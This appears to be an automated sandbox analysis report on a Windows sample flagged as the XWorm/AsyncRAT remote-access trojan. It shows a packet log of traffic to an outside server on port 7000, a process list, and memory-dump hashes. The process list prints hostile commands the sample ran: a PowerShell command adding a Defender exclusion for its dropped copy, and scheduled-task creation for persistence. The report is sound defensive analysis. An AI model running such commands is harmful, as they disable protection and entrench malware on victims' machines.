Nov 25, 2024 06:27:37.389918089 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:40.033132076 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:40.152755022 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:40.400119066 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:40.520629883 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:40.520737886 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:40.640402079 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:40.969315052 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:41.088823080 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:41.977132082 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:42.096674919 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:42.336674929 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:42.456234932 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:42.851722956 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:42.971179008 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:43.059423923 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:43.125880957 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:47.576018095 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:47.695501089 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:47.978082895 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:48.097645998 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:48.097744942 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:48.217261076 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:49.551419973 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:49.670909882 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:49.670955896 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:49.790515900 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:50.125859022 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:50.245404005 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:51.390902996 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:51.510364056 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:51.897392988 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:52.016907930 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:52.017178059 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:52.136797905 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:52.671328068 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:52.790774107 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:54.198834896 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:54.318547964 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:55.359451056 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:55.478974104 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:55.526082039 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:55.645787954 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:55.645837069 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:55.765376091 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:57.047965050 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:57.167454958 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:57.491758108 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:57.611249924 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:58.707829952 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:58.827595949 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:58.827652931 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:58.947216988 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:27:58.947257996 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:27:59.066940069 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:00.117614031 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:00.237384081 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:01.100861073 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:01.220376015 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:01.805645943 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:01.925154924 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:02.460979939 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:02.580576897 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:06.533147097 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:06.652769089 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:08.126241922 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:08.245831966 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:08.466020107 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:08.585542917 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:08.592597961 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:08.712065935 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:10.429256916 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:10.548808098 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:10.548856020 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:10.668309927 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:10.668355942 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:10.788639069 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:11.061686039 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:11.182142973 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:11.182198048 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:11.301657915 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:11.301707983 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:11.421624899 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:11.427418947 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:11.546886921 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:11.970057011 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:12.089894056 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:12.686772108 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:12.806337118 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:12.806505919 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:12.926009893 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:13.069282055 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:13.126064062 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:14.463332891 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:14.583353996 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:15.755742073 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:15.875327110 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:16.705473900 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:16.825056076 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:16.827461004 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:16.947004080 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:20.411338091 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:20.531065941 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:20.807631016 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:20.927356958 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:20.927406073 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:21.046868086 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:22.872056007 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:22.991636038 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:23.751351118 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:23.870906115 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:24.131230116 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:24.250911951 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:24.432094097 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:24.551695108 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:24.601260900 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:24.848011971 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:24.848088026 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:24.968420982 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:26.498641014 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:26.619112968 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:26.927558899 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:27.047096014 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:28.487765074 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:28.607436895 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:28.607481956 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:28.727098942 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:28.727140903 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:28.846678972 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:29.351336002 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:29.471000910 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:30.553886890 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:30.922863007 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:30.964472055 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:30.964523077 CET  49735        7000       192.168.2.4    18.181.154.24
Nov 25, 2024 06:28:31.042380095 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:31.084222078 CET  7000         49735      18.181.154.24  192.168.2.4
Nov 25, 2024 06:28:33.428558111 CET  49735        7000       192.168.2.4    18.181.154.24

Target ID: 0
Start time: 00:24:56
Start date: 25/11/2024
Path: C:\Users\user\Desktop\9758xBqgE1azKnB.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Imagebase: 0xbd0000
File size: 450'048 bytes
MD5 hash: BF7866489443A237806A4D3D5701CDF3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 00:24:57
Start date: 25/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
Imagebase: 0x4f0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 00:24:57
Start date: 25/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 00:24:57
Start date: 25/11/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpAD87.tmp"
Imagebase: 0x440000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 00:24:57
Start date: 25/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 00:24:58
Start date: 25/11/2024
Path: C:\Users\user\Desktop\9758xBqgE1azKnB.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Imagebase: 0xc0000
File size: 450'048 bytes
MD5 hash: BF7866489443A237806A4D3D5701CDF3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 7
Start time: 00:24:58
Start date: 25/11/2024
Path: C:\Users\user\Desktop\9758xBqgE1azKnB.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\9758xBqgE1azKnB.exe"
Imagebase: 0xef0000
File size: 450'048 bytes
MD5 hash: BF7866489443A237806A4D3D5701CDF3
Has elevated privileges: true
Has administrator privileges: true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:00:24:59
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      Imagebase:0x7b0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 58%, ReversingLabs
                                                                      • Detection: 55%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:00:24:59
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                      Imagebase:0x7ff693ab0000
                                                                      File size:496'640 bytes
                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:10
                                                                      Start time:00:25:01
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpBA0A.tmp"
                                                                      Imagebase:0x440000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:11
                                                                      Start time:00:25:01
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:12
                                                                      Start time:00:25:01
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
                                                                      Imagebase:0x160000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:13
                                                                      Start time:00:25:01
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe"
                                                                      Imagebase:0xae0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.1753363260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:00:25:10
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0xa80000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 58%, ReversingLabs
                                                                      • Detection: 55%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:15
                                                                      Start time:00:25:11
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmpE11A.tmp"
                                                                      Imagebase:0x440000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:16
                                                                      Start time:00:25:11
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:00:25:11
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:19
                                                                      Start time:00:25:18
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0x1e0000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:22
                                                                      Start time:00:25:19
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\grjujyNaBLaKbU" /XML "C:\Users\user\AppData\Local\Temp\tmp21F.tmp"
                                                                      Imagebase:0x440000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:23
                                                                      Start time:00:25:19
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:24
                                                                      Start time:00:25:19
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe"
                                                                      Imagebase:0x720000
                                                                      File size:450'048 bytes
                                                                      MD5 hash:BF7866489443A237806A4D3D5701CDF3
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Target ID:28
                                                                      Start time:00:28:30
                                                                      Start date:25/11/2024
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 1852
                                                                      Imagebase:0x180000
                                                                      File size:483'680 bytes
                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true


                                                                        Execution Graph

                                                                        Execution Coverage:10.2%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:170
                                                                        Total number of Limit Nodes:8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (otq$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$4|yq$4|yq$$tq
                                                                        • API String ID: 0-1537292367
                                                                        • Opcode ID: bdf144cbfed2e7b6448e47cbefb7a607c919e57e6b9e64f2905a64c95c8c488f
                                                                        • Instruction ID: d41cdc4c2ba7732610c9959ae4be84c4327859823b0af551e4eb97e3f2113504
                                                                        • Opcode Fuzzy Hash: bdf144cbfed2e7b6448e47cbefb7a607c919e57e6b9e64f2905a64c95c8c488f
                                                                        • Instruction Fuzzy Hash: 24631B74B04619CFCB24CF68C8A4A9DBBB2BF89314F158599E519AB361DB30ED81CF50

                                                                        Control-flow Graph (rendered graph; edge list not reproduced)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'tq$:$pxq$~
                                                                        • API String ID: 0-2366959149
                                                                        • Opcode ID: 2e009b4d77ac60da5230bdd814517acc3e1d99a17436139f9784726d41eb44f6
                                                                        • Instruction ID: 931ed2775a198bdd27bcd77581564e3e39d12cc2447b998d7ad621c922516662
                                                                        • Opcode Fuzzy Hash: 2e009b4d77ac60da5230bdd814517acc3e1d99a17436139f9784726d41eb44f6
                                                                        • Instruction Fuzzy Hash: 1342E375E00228DFDB19CFA9C950B99BBB2FF48304F1580E9E619AB261D731AD91DF10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be7aa95f9caf766e4748e1df87fc78016e3d86d52dd74237554d2cf6f632698f
                                                                        • Instruction ID: ee38291218a30209006f897e168e2961ff0e9c0b8b325e53429ecc655d52c9dd
                                                                        • Opcode Fuzzy Hash: be7aa95f9caf766e4748e1df87fc78016e3d86d52dd74237554d2cf6f632698f
                                                                        • Instruction Fuzzy Hash: 13C18AB07007068FDB29DB79C450BAEB7FAAF99B00F54846DD546CB690EB35E801CB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 620fa7c79930c8886174b663be9f8c30aca50cfa76aaa45e1c4d0b0f5cf51a5a
